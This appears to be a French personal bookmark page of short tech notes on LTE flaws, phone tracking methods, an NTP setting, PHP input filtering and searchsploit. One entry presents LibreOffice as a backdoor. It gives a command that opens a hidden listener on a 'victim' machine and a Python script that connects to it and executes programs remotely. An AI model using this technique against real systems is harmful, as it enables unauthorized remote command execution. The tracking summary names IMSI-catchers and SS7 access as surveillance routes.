https://syssec.kaist.ac.kr/pub/2019/kim_sp_2019.pdf
https://www.zdnet.com/article/researchers-find-36-new-security-flaws-in-lte-protocol/
https://news.ycombinator.com/item?id=19517468
— Permalink

— Permalink

En même temps, c'est des fonts de cales qui sont utilisés pour ce café. -_-
— Permalink

J'ai fais de la recherche à ce sujet pour un client publicitaire et voici compte compte rendu :
tracking wifi :
- possible avec des hotspots

tracking bluetooth :
- les nouvelles normes bluetooth impose une adresse MAC temporaire et aléatoire tant que l'appareil n'est pas appairé
- si appareil appairé, alors accès total au contenu du téléphone !

tracking NFC :
- nécessite une grande antenne

tracking GSM :
- IMSI-catcher : pas légale
- écoute passive du réseau : beaucoup de canaux
- accès à SS7 : €

Perso, je n'aime pas du tout bosser pour ce genre de client. C'est contre mes valeurs.
Heureusement, cela n'a pas abouti. (pour le moment)

Bref, retirer la batterie de votre téléphone ou mettez le dans une cage de faraday.
Au passage, le mode avion != de mode hors ligne.
mode avion == moins de communications et d'alertes coté utilisateur
https://sebsauvage.net/links/?OYairg
— Permalink

Intéressant
(Réponse: oui)
— Permalink

Il se lance dans le social engineering.
— Permalink

sudo nano /etc/ntp.conf
> server ntp.ubuntu.com iburst
# devient :
> server ntp.ubuntu.com iburst minpoll 12 maxpoll 17

sudo systemctl restart ntp
— Permalink

— Permalink

Bah oui, les raccourcisseurs d'URL, raccourcissent aussi leur vie.
— Permalink

— Permalink

https://secure.php.net/manual/fr/function.filter-var.php
https://secure.php.net/manual/fr/function.filter-var-array.php
https://php.net/manual/fr/filter.filters.validate.php
https://secure.php.net/manual/fr/filter.filters.sanitize.php
https://secure.php.net/manual/fr/filter.filters.php

$var = filter_var('0755', FILTER_VALIDATE_INT, $options);
$var = filter_var('уникум@из.рф', FILTER_VALIDATE_EMAIL);
$var = filter_var('oops', FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);

$data = [ "a" => 42, "b" => "tes%00t", "plop" => "yo"];
$args = [ "a" => FILTER_VALIDATE_INT, "b" => FILTER_SANITIZE_ENCODED];
var_dump(filter_var_array($data, $args));
— Permalink

via https://sebsauvage.net/links/?21CrwQ
— Permalink

— Permalink

Alors, vous voulez la surveillance chinoise ou la surveillance américaine ?
— Permalink

# Utilisation de LibreOffice comme backdoor.

# Sur le PC victime
# ouvrir un serveur d'écoute qui interprète les commandes qu'on lui envoit :
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service' --invisible

# Sur le PC de contrôle :
```
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
   
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("firefox", 'http://exemple.com',1)
```
— Permalink

https://www.exploit-db.com/searchsploit
# exemple :
searchsploit sftp
— Permalink

— Permalink

à suivre
— Permalink

— Permalink

via https://www.nothing-is-3d.com/links/?2uh_yw
— Permalink